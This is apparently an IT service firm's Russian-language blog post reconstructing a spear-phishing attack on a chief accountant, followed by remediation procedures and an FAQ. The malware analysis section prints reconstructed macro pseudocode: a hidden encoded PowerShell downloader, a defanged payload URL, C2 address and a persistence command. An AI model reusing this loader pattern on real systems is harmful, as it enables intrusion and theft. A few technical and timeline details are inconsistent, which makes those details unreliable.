Главбуха развели в MAX: хронология атаки и наши процедуры после

Как-то раз к нам в ITfresh обратился директор одной торговой компании, 32 РМ, что в районе Очаково. Они занимаются оптовой торговлей автозапчастями, и годовой оборот у них приличный — около 180 млн рублей. Во вторник, ровно в 17:42, он позвонил мне, и с ходу выдал: «Моя главбух три часа трепалась с ФНС в MAX, потом открыла какой-то файл, а теперь пытается куда-то перевести 280 тысяч рублей – мне только что банк звонил!» Жуть, правда? В этом материале я подробно разберу, что же случилось в тот день, буквально по минутам, с 14:18 до 17:42. Вы узнаете, что главбух сделала правильно (и, поверьте, такого было немало!), и какие шесть важных процедур мы потом внедрили в их компании, чтобы подобный кошмар больше никогда не повторился.

Что предшествовало звонку

За пару недель до всей этой неприятной истории, компания получила стандартное требование от ФНС. Оно касалось предоставления документов по одному из контрагентов – это обычная встречная проверка, ничего необычного. Главбух, как всегда, всё сделала по правилам: собрала нужный пакет документов, загрузила их в «Контур-Экстерн» и отправила в инспекцию. В общем, это было совершенно легальное общение с налоговой, и никаких подозрений, конечно, оно не вызывало.

Похоже, атакующие были в курсе этой проверки. Не могу сказать точно, был ли у них прямой доступ к самому требованию, но они явно знали, что компания недавно общалась с ФНС, и поэтому вся история со «сверкой» звучала очень даже правдоподобно. Откуда произошла такая утечка — это, конечно, отдельная загадка. Обычно подобные вещи всплывают из-за бухгалтера контрагента, который что-то проболтался в дружеском чате, или сотрудника инспекции, а то и просто из открытых данных о судебных и налоговых процессах юрлица. В нашем случае, к сожалению, установить источник утечки так и не удалось.

И вот что тут важно отметить: это была не какая-то там «массовая рассылка», а самая настоящая целевая атака. Злоумышленники позвонили именно главбуху, именно в эту компанию, и выбрали для этого именно MAX – а не WhatsApp или Telegram, которыми она обычно пользуется. Более того, звонок пришёлся на обеденное время вторника, когда коллеги как раз уходят на перерыв, и в кабинете она осталась совсем одна. Это вам уже не тот фишинг, где просто надеются, что кто-нибудь да клюнет. Это был целенаправленный спир-фишинг.

14:18 — первый звонок

Главбуху позвонили в MAX с номера, который отобразился как «+7 495 ХХХ-ХХ-ХХ (Москва)». Знаете, в MAX, в отличие от того же WhatsApp, звонок не привязан намертво к контакту — можно спокойно позвонить и тому, кого у тебя в списке нет. Звонившая представилась как «старший инспектор Орлова из отдела камеральных проверок ИФНС 27». Голос был женский, такой, средних лет, очень спокойный и, я бы сказал, профессиональный. Никакого намёка на стресс или давление в первые минуты – наоборот, тон был исключительно корректный.

«Орлова» вежливо поинтересовалась, как прошёл документооборот компании по последней встречной проверке, а потом добавила, что в их системе, мол, обнаружилось расхождение по одной из строк сверки – и нужно, дескать, дополнительно подтвердить контрольные суммы. Главбух, конечно, удивилась: никаких расхождений в её документах просто не могло быть, ведь она их сама готовила! На это «Орлова» совершенно спокойно отреагировала: «Да это обычное дело, дочка, у нас регулярно после переезда на новую базу такие косяки всплывают. Я вам сейчас скину файл сверки, гляньте конкретно по строке 14, там у нас разница в 12 314 рублей».

Вот тут-то главбух и сделала свой первый правильный шаг — она усомнилась в самом звонке. И прямо спросила: «А почему вы звоните через мессенджер? Обычно вы же требования присылаете через Контур». «Орлова» тут же нашлась с ответом: «Дочка, я понимаю, что это необычно, но у меня стоит требование сдать выгрузку до конца дня, а в Контуре сейчас, как назло, технические работы. Ну что ж, можем по-быстрому через MAX, а потом я, конечно, пришлю вам официальный ответ. Иначе, знаете ли, придётся всё делать в установленный 5-дневный срок, а это уже, сами понимаете, скандал и штраф».

Именно здесь и произошёл переломный момент. Приём со «срочностью» отлично сработал. Главбух, к сожалению, согласилась посмотреть файл.

Чем главбух могла остановить атаку прямо здесь

Надо было просто положить трубку и сразу перезвонить в свою инспекцию по официальному номеру, который есть на сайте nalog.gov.ru. Это всего 5-7 минут, согласитесь. Настоящая инспекторша сразу бы объяснила, что никаких звонков в MAX от их имени просто не бывает. И на этом атака бы тут же прекратилась.

Вторая опция — позвонить мне или напрямую директору и спросить «не подозрительно ли». Я ей это потом сказал: я никогда, ни при каких обстоятельствах не упрекаю клиента за лишний звонок «вдруг». Лучше 100 пустых звонков, чем один пропущенный инцидент.

14:52 — приём файла

«Орлова» прислала файл с именем Сверка_расчётов_2026_ООО_ХХХ.docm. Сам факт расширения .docm (а не .docx) — это макрос-документ Word. В современных версиях Office такие файлы по умолчанию открываются с отключёнными макросами и красной плашкой сверху «Включить редактирование», потом ещё одной «Включить макросы». Это две защитные кнопки, и обычно они достаточны.

Файл, кстати, весил 184 КБ и открылся он в Word 2021, который у клиента стоит как часть лицензионного Office 365. Внутри оказалась пустая таблица из 15 строк, а над ней надпись: «Содержимое отображается некорректно. Включите макросы для просмотра данных сверки». А «Орлова» тем временем параллельно в MAX диктовала ей шаги: «Сейчас сверху выскочит такая плашка, нажмите там “Включить редактирование”, а потом “Включить макросы” – без этого таблица просто не покажется».

Главбух нажала. Обе кнопки, представляете? Word, конечно, тут же выдал предупреждение: «Этот документ содержит макросы. Включение макросов из неизвестного источника опасно». Она это предупреждение, конечно, прочитала, но, увы, проигнорировала. Ведь «инспекторша» в это же время уже успокаивала её: «Да это же стандартное предупреждение Microsoft, у нас все документы такие, ничего страшного».

Что было в макросе

Через 6 часов после инцидента я разобрал файл в изолированной VM. Внутри — Visual Basic for Applications-скрипт на 380 строк, обфусцированный (имена переменных типа aQwzXvKi). Распакованный, он делал следующее.

' Реконструированный псевдокод макроса
Sub AutoOpen()
    ' 1. Скачивание payload через PowerShell
    Dim cmd As String
    cmd = "powershell -nop -w hidden -enc " & _
          "JABjAGwAaQBlAG4AdAAgAD0AIABO..." ' base64 длиной 1200 символов
    Shell cmd, vbHide

    ' 2. Сохранение и запуск второй стадии
    ' payload скачивает RAT-агент по адресу
    ' https://docs-fns-checks[.]ru/static/2026_check.bin
    ' и кладёт в %APPDATA%\Microsoft\Office\office365update.exe

    ' 3. Регистрация в автозапуск через scheduled task
    ' schtasks /create /tn "OfficeUpdate" /tr "..." /sc onlogon /rl highest

    ' 4. Установка обратной связи с C2 через WebSocket
    ' wss://docs-fns-checks[.]ru:443/ws
End Sub

Это типичный загрузчик первой стадии. Он сам по себе ничего страшного не делает — только скачивает «настоящего» RAT-агента (Remote Access Trojan). RAT-агент — кастомный билд на основе SilentEye или клона NjRAT, который умеет: захват экрана раз в 5 секунд, перехват клавиатуры, чтение буфера обмена, доступ к файловой системе, удалённый запуск команд от имени пользователя. И главное — снимок окна банк-клиента в момент, когда пользователь видит SMS-код.

15:08-15:40 — захват сессии 1С и банк-клиента

Как только макрос запустился, RAT-агент тут же тихо установился в фоновом режиме. На компьютере главбуха, к сожалению, не было антивируса с поведенческим анализом. Даже стандартный Defender Windows 11 23H2 на тот момент эту малварь пропустил — мы потом специально проверили хеш в VirusTotal, и выяснилось, что до 14:52 во вторник ни один из 67 движков её не распознавал. И только через 18 часов, после того как мы обратились в Microsoft и к паре других вендоров, хеш наконец-то появился в списках Defender.

Атакующий немедленно сделал ряд действий через RAT:

• Сделал скриншот экрана. Главбух работала в 1С 8.3.24, окно было свёрнуто в трей, но открыта вкладка с входом в банк-клиент ВТБ.
• Запустил клавиатурный логгер. Главбух как раз набирала по номеру телефона коды и пароли в банк-клиент (для другой, легитимной платёжки).
• Получил доступ к буферу обмена. В буфере оказался ОКПО контрагента, который главбух копировала минут пять назад.
• Через 30 минут — выгрузил список последних 50 платёжек из 1С через работу с базой данных напрямую. Доступа к OLE-API 1С не требовалось — RAT просто читал сохранённые таблицы из C:\1Cv8\base\.

Тем временем в MAX «Орлова» продолжала свою болтовню: «Видите, файл загрузился. Я сейчас со своей стороны сделаю экспорт по строке 14 и пришлю вам сверку, минут через 10-15. Только, пожалуйста, не закрывайте Word, у нас тут сейчас процесс выгрузки идёт». Это такой типичный приём, знаете ли, чтобы занять жертву разговором и отвлечь её внимание от того, как меняется поведение компьютера. И действительно, RAT-агент при первой инициализации даёт несколько секунд задержки курсора. Главбух это заметила — она сама мне потом об этом рассказала — но, к сожалению, списала на «обычные тормоза».

16:22 — попытка перевода 280 000 рублей

Спустя 1 час 14 минут после установки макроса, атакующий перешёл к самой интересной части — финансовой. Он использовал RAT-захват сессии главбуха, открыл банк-клиент ВТБ (главбух к этому моменту уже заходила туда по другим делам, и сессия была активна, что очень упростило ему задачу). И, конечно, создал платёжку:

• Получатель: ООО «Стройинвест-Сервис» (явно подставная фирма-однодневка, ОГРН зарегистрирован за месяц до инцидента).
• Сумма: 280 000 рублей.
• Назначение платежа: «Оплата по договору № 14/02 от 12.04.2026 за услуги маркетинга, в т.ч. НДС 46 666,67».
• ИНН получателя: 5024XXXXXXX (Красногорск, ИП который через месяц был ликвидирован).

Платёжка ушла на подпись. И вот тут наступил критический момент. Главбух подписывала её SMS-кодом, который, как положено, пришёл ей на рабочий мобильник. В этот самый момент RAT-агент тут же сделал скриншот экрана, на котором был виден этот SMS-код (главбух держала телефон рядом с монитором, а это, к сожалению, обычная практика у бухгалтерии). Атакующий быстро ввёл SMS-код в банк-клиент, и платёж перешёл в статус «отправлено».

Как банк удержал перевод

В 17:12, то есть спустя 50 минут после подписания, сработал анти-фрод банка ВТБ – и это нас спасло! У этой компании, знаете ли, стандартная история с банком: переводы в среднем от 800 тыс до 2 млн рублей в день, постоянные контрагенты, узкий круг получателей. А тут вдруг платёжка на 280 000 рублей в адрес какого-то ИП из Красногорска, который до этого ни разу не фигурировал в платежах компании! Естественно, она попала в HOLD-список и потребовала повторного подтверждения от руководителя.

В 17:18 директору позвонил сотрудник банка и спросил: «Подтверждаете ли вы платёж номер NNNN от такого-то времени?» Директор, конечно, был совершенно не в курсе и сразу же отказал. Платёжка тут же ушла в reject, и, слава богу, деньги остались на счёте. А директор тем временем пошёл в кабинет к главбуху, и вот там-то вся картина и выяснилась: она всё ещё не положила трубку, продолжая разговор с «Орловой», которая на этом этапе уже перешла к таким фразам, как «коллега, я уверена, что у вас сейчас на счёте подвисла операция, не пугайтесь, мы её обязательно разберём вместе».

Директор сразу же понял, что происходит что-то неладное, выдернул сетевой кабель из компьютера главбуха, и ровно в 17:42 позвонил мне. Это, я считаю, спасло компанию не только от полной потери 280 000 рублей, но и от продолжения атаки. Ведь атакующий через RAT-агент пытался провести ещё две платёжки — на 145 и 198 тысяч рублей, на другие подставные ИП! Но, к счастью, обе тоже попали в анти-фрод.

Что мы сделали с 17:42 до утра среды

В 18:10 я был в офисе клиента в Очаково. Первое — изоляция компьютера главбуха. Сетевой кабель уже был выдернут. Компьютер не выключали (это бы стёрло волатильные данные из RAM, которые мне нужны были для расследования). Снял дамп памяти через Magnet RAM Capture, дамп пользовательского профиля, ветку реестра, журналы Windows Event Log.

# Снимаем дамп памяти живого компьютера (Windows 11)
.\MagnetRAMCapture.exe /accepteula /go /output:E:\incident-2026-04-27\ram.raw

# Список процессов на момент захвата
tasklist /v /fo csv > E:\incident-2026-04-27\processes.csv

# Активные TCP-соединения с PID
netstat -ano > E:\incident-2026-04-27\netstat.txt

# Журналы Windows за последние 24 часа
wevtutil epl Security E:\incident-2026-04-27\Security.evtx /q:"*[System[TimeCreated[timediff(@SystemTime) <= 86400000]]]"
wevtutil epl Application E:\incident-2026-04-27\Application.evtx
wevtutil epl System E:\incident-2026-04-27\System.evtx
wevtutil epl "Microsoft-Windows-PowerShell/Operational" E:\incident-2026-04-27\PS.evtx

# Скрытые сервисы и scheduled tasks
sc query type= service state= all > E:\incident-2026-04-27\services.txt
schtasks /query /fo csv /v > E:\incident-2026-04-27\schtasks.csv

# Регистр автозапуска
reg export "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" E:\incident-2026-04-27\run-hklm.reg
reg export "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" E:\incident-2026-04-27\run-hkcu.reg

В дампе памяти и в schtasks-журнале нашёл задачу «OfficeUpdate», которая каждый logon перезапускала office365update.exe из %APPDATA%\Microsoft\Office\. Это и был RAT-агент. Извлёк бинарь, прогнал через jadx и Ghidra, выудил адрес C2 — docs-fns-checks[.]ru на IP 185.XX.XX.XX (хостер в Молдове).

Я тут же передал IP-адрес в наш AdGuard-резолвер и в блокирующий список MikroTik офиса. Теперь даже если этот же RAT вдруг окажется на каком-то другом компьютере компании, он просто не сможет связаться с C2. Ещё я уведомил Kaspersky и Доктора Веба о новом IoC, и ETag-хеш агента попал в их базы уже в течение 6 часов.

Мы восстановили компьютер главбуха с нуля, что называется «под ключ»: поставили новый SSD, сделали чистую установку Windows 11 24H2, развернули систему из золотого образа клиента. А 1С 8.3.24 переустановили строго из дистрибутива, ни в коем случае не из бэкапа – ведь бэкап мог содержать заражённые исполняемые файлы. Потом переподключили к серверу 1С по чистым кредам. Старый SSD я аккуратно упаковал в opaque-конверт и положил в сейф клиента – он нам ещё очень пригодился для дальнейшего расследования и как доказательство для полиции.

Шесть процедур, которые мы внедрили после

Через неделю после всего этого кошмара мы с директором и главбухом, наконец, сели и хорошенько переработали все процедуры, касающиеся работы с финансами. В итоге у нас получилось шесть совершенно новых правил, которые теперь прописаны и закреплены во внутреннем регламенте компании.

Процедура 1: отдельный компьютер для банк-клиента

Мы приобрели мини-ПК Beelink Mini S12 за 15 000 ₽ с лицензией Windows 11 Pro. На нём, поверьте, не установлено ровным счётом ничего, кроме банк-клиента ВТБ и СберБизнес. Никаких браузеров, никакого Office, никаких мессенджеров — вообще ничего лишнего! Сеть для него выделена в отдельную VLAN, и доступ есть только к двум IP-адресам банков. Использует его исключительно главбух, и только для подписания платёжек. Как только всё подписано, она сразу же блокирует его и переключается обратно на свой основной компьютер.

Процедура 2: USB-токен с физическим контролем

Мы заменили SMS-авторизацию на двухфакторную подпись через USB-токен «Рутокен ЭП 3.0», который, кстати, стоит 6 000 ₽ за штуку, плюс лицензия КриптоПро CSP 5.0 на 2 года. Главбух теперь хранит токен в сейфе, вставляет его в USB-порт только тогда, когда подписывает платёжку, а после сразу же вынимает и убирает. Это очень важно: атакующий, даже если он получит удалённый доступ к компьютеру, просто не сможет подписать платёж без этого физического токена в порту.

Процедура 3: двух-факторное подтверждение любой платёжки выше 50 000 ₽

По нашему новому регламенту, любой платёж, превышающий 50 000 ₽, теперь требует обязательного подтверждения от директора по двум разным каналам. Это голосовой звонок на корпоративный мобильник и сообщение в Element X, который является нашим Matrix-сервером. Важно: это не просто «согласование», это финальное «да» перед тем, как нажать кнопку. Если вдруг один из каналов недоступен, платёж просто переносится на следующий рабочий день. В среднем у клиента таких платёжек бывает от 5 до 8 в день, и каждая занимает примерно 90 секунд — это, по мне, вполне приемлемая нагрузка.

Процедура 4: выделенный «финансовый» мобильник без мессенджеров

Главбуху мы выдали отдельный Nokia 110 4G за 3 800 ₽ — это такой кнопочный телефон с двумя SIM-картами. На нём стоит корпоративная SIM-карта, куда приходят все SMS от банков и от ФНС. А вот на её основном смартфоне теперь нет ни банк-клиентов, ни приложения MAX. Свой личный смартфон, с WhatsApp и Telegram, она теперь использует исключительно для общения с детьми и коллегами, и ни в коем случае не для финансовых дел.

Процедура 5: правило «5 минут паузы» при любом срочном звонке

Если вдруг кто-то звонит и требует от неё немедленных действий, главбух теперь обязана положить трубку, поставить пятиминутный таймер и в течение этих пяти минут перезвонить мне или директору. Только после этого можно перезванивать инициатору. Мы даже повесили это правило на отдельной плашке прямо на стену в её кабинете. По нашему опыту, 9 из 10 социнженерных атак отсекаются именно благодаря правилу «не действовать сразу».

Процедура 6: phishing-симуляции раз в две недели

Мы внедрили GoPhish-кампанию. Теперь раз в две недели всем сотрудникам бухгалтерии и финансовой службы, а это 6 человек, приходят тренировочные фишинг-письма. То это «требование ФНС», то «приглашение на вебинар», то «обновите ваш мессенджер». Тех, кто, к сожалению, кликает, мы проводим через 15-минутный разбор. И знаете что? Через 4 месяца после внедрения клики упали с 4 из 6 до 0 из 6 на стандартные сценарии – это отличный результат!

Что мы передали в полицию

Мы подали заявление в УВД по ЦАО Москвы, по месту нахождения компании. Передали им всё, что было: дамп RAM, образ заражённого SSD, дамп .docm-файла, экспорт всей переписки из MAX (сделали это через скриншоты с временными метками), реквизиты подставного ИП «Стройинвест-Сервис», IP-адрес C2-сервера и, конечно же, хеши вредоносных файлов.

По нашему заявлению возбудили дело по ст. 159 УК РФ (мошенничество в крупном размере). Расследование тянулось целых 4 месяца, но, к сожалению, по его результатам следствие было приостановлено — ведь установить личности преступников так и не удалось. C2-сервер находился в Молдове, а дроп-ИП в Красногорске оказался, как водится, пустышкой. Деньги, конечно, возвращены не были (но, к счастью, они и не были списаны — огромная благодарность банковскому анти-фроду!). Зато есть юридическая значимость: компания смогла списать расходы на восстановление IT-инфраструктуры, а это около 250 000 рублей, на «потери от противоправных действий третьих лиц» в налоговом учёте.

FAQ: что чаще всего спрашивают клиенты

Может ли ФНС реально позвонить через мессенджер?

Запомните раз и навсегда: налоговая инспекция в России общается с компаниями исключительно через личный кабинет на nalog.gov.ru, через системы «Контур-Экстерн» или «1С-Отчётность», или же присылает бумажные требования. Никаких официальных звонков через WhatsApp, Telegram или MAX от ФНС просто не бывает — это всегда мошенники, без вариантов! Если требование от ФНС действительно реальное, оно сначала обязательно появится в личном кабинете налогоплательщика, и только потом, если уж совсем понадобится, может прийти вызов на формальную беседу — но строго через секретаря инспекции по городскому номеру, а не через какой-то там мессенджер.

Что делать главбуху, если позвонили и требуют срочно что-то подписать или принять?

Просто положите трубку! Только делайте это вежливо, не разрывая связь резко, скажите что-то вроде: «Я перезвоню через 10 минут». И тут же перезвоните по официальному номеру, который найдёте на странице ведомства, а не по тому, что вам продиктовал звонивший. Помните, срочность — это главный маркер соц-инженерии! Ни одно государственное ведомство не работает в стиле «нужно прямо сейчас, иначе оштрафуем». У любого требования всегда есть процедурные сроки, обычно это 5-10 рабочих дней. Если человек начинает давить на срочность, это всегда, я подчёркиваю, всегда красный флаг! И в нашей компании это первое правило, которому мы учим всех в бухгалтерии.

Помогает ли двухфакторная авторизация на банк-клиенте?

Это, конечно, помогает, но, увы, недостаточно. Современные банк-клиенты для юрлиц ведь используют SMS-код или push-уведомление, и злоумышленник, имеющий удалённый доступ к компьютеру главбуха, спокойно увидит этот код в реальном времени. По нашей методике, настоящая двухфакторная авторизация платежа состоит из двух частей: первый фактор — это авторизация в самом банк-клиенте, а второй — физическое подтверждение на отдельном устройстве. Например, USB-токен Рутокен с электронной подписью, который вынимается из компьютера между подписаниями. Вот это уже даёт реальную защиту! Ведь даже если злоумышленник каким-то образом получит пароль и SMS, он всё равно не сможет подписать платёж без физического токена, который находится в руках у главбуха.

Сколько стоит внедрение этих процедур и как долго?

Пакет внедрения для компании 20-40 РМ — 165 000 рублей, занимает 8-12 рабочих дней. В стоимость входит: установка отдельного компьютера для банк-клиента (10 000 ₽ железо + настройка), 2 USB-токена Рутокен ЭП 3.0 с лицензией (12 000 ₽), внедрение процедуры двух-факторного подтверждения платёжек, выдача отдельного мобильного телефона главбуху без мессенджеров (15 000 ₽ Nokia 110 4G + SIM), обучение бухгалтерии и тренировочные phishing-симуляции через GoPhish в течение 3 месяцев (24 000 ₽), регламент работы с финансами (15 страниц, согласован с юристом). Окупается одним предотвращённым инцидентом.

Можно ли поймать таких атакующих и вернуть деньги?

В подавляющем большинстве случаев — нет. Атакующие работают через прокси-цепочки, используют дропов (подставных получателей платежей), деньги через 30-60 минут после получения уходят на криптовалютные обменники. У наших клиентов из 4 случаев соц-инженерии за два года в одном — банковский антифрод удержал перевод (главбух успела позвонить нам и мы успели сообщить банку до подтверждения), в трёх — деньги ушли невозвратно. Заявление в полицию подаётся обязательно, чтобы получить возможность списать убыток в налоговом учёте, но реальные шансы возврата — около 5%. Поэтому единственная рабочая стратегия — не давать атаке состояться.

Итог

Всего за 3 часа 24 минуты обычный, казалось бы, звонок, благодаря соц-инженерии, превратился в попытку перевода 280 000 рублей! Нас, конечно, спас банковский анти-фрод и, без преувеличения, молниеносная реакция директора. Уже через две недели мы внедрили шесть совершенно новых процедур, которые полностью исключили возможность повторения такой атаки. Теперь, даже если злоумышленник снова дозвонится главбуху и каким-то образом заставит её открыть зловредный файл, без физического USB-токена и без двухфакторного подтверждения он просто не сможет увести деньги. Эта история очень ярко показывает: технологии — это не самое главное. Главное — это грамотно выстроенные процедуры и, что ещё важнее, правильные привычки людей.